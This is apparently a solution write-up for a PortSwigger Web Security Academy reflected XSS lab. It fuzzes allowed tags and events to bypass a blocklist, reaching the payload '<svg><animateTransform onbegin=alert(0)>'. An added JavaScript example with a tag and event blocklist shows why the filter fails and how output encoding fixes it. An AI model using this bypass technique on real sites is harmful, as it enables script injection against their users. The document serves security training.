| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Difficulty | Practitioner |
| Vulnerability | Reflected XSS — SVG Tag Bypass |
| Injection Point | search URL parameter |
| Goal | Fire an alert via an allowed SVG tag and event |

# Lab — Reflected XSS: SVG Tag Bypass

## Solution Walkthrough

Testing common tags — all blocked. Custom tags pass but need event handlers that work. Time to enumerate systematically.

### Step 1 — Find allowed tags

Intercepting the request and sending to Intruder with the tag position fuzzed:

```text
/?search=<§tag§>
```

Tags returning HTTP 200: `image`, `svg`, `title`, `animateTransform`.

### Step 2 — Confirm the SVG + animateTransform combination

```http
GET /?search=<svg><animateTransform> HTTP/1.1
```

HTTP 200 — valid combination.

### Step 3 — Enumerate allowed events on animateTransform

Sending to Intruder and fuzzing the event handler:

```http
GET /?search=<svg><animateTransform §event§=1> HTTP/1.1
```

`onbegin` returns HTTP 200.

### Step 4 — Inject the payload

```text
/?search=<svg><animateTransform onbegin=alert(0)>
```

Alert fires and the lab is solved :P
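
Why the tag and event blocklist enumerated in Steps 1 to 3 fails, and what closes the gap, as an added example that is not part of the original walkthrough or the lab's own code. The blocklist contents, the `renderFiltered`/`renderEncoded` functions and the response template are constructed assumptions; only the Step 4 payload comes from the page.

```javascript
// Added example. The blocklist contents are constructed assumptions that only
// model the behaviour described above (common tags/events rejected).
const BLOCKED_TAGS = new Set(["script", "img", "body", "iframe", "a", "div", "input"]);
const BLOCKED_EVENTS = new Set(["onload", "onerror", "onclick", "onmouseover", "onfocus"]);

// Blocklist check: true when no listed tag or event handler appears in the input.
function blocklistAllows(input) {
  const tags = [...input.matchAll(/<\s*\/?\s*([a-z][a-z0-9-]*)/gi)].map(m => m[1].toLowerCase());
  const events = [...input.matchAll(/\s(on[a-z]+)\s*=/gi)].map(m => m[1].toLowerCase());
  return !tags.some(t => BLOCKED_TAGS.has(t)) && !events.some(e => BLOCKED_EVENTS.has(e));
}

// Output encoding for an HTML text node or quoted attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// "Before": the term is reflected raw once the blocklist lets it through.
function renderFiltered(search) {
  if (!blocklistAllows(search)) return null; // request rejected
  return `<h1>0 search results for '${search}'</h1>`;
}

// "After": the term is encoded at the point of output; no tag list to maintain.
function renderEncoded(search) {
  return `<h1>0 search results for '${escapeHtml(search)}'</h1>`;
}

// True when the response still carries the given tag as live markup.
function reflectsLiveTag(html, tag) {
  return html !== null && html.toLowerCase().includes("<" + tag.toLowerCase());
}

const blockedSample = "<img src=1>";                              // a common tag
const labPayload = "<svg><animateTransform onbegin=alert(0)>";    // from Step 4

console.log(renderFiltered(blockedSample));  // null
console.log(renderFiltered(labPayload));     // markup reflected intact
console.log(renderEncoded(labPayload));      // markup reflected as inert text
```

The blocklist only stops the names someone remembered to list, while encoding at output handles every tag and event the same way.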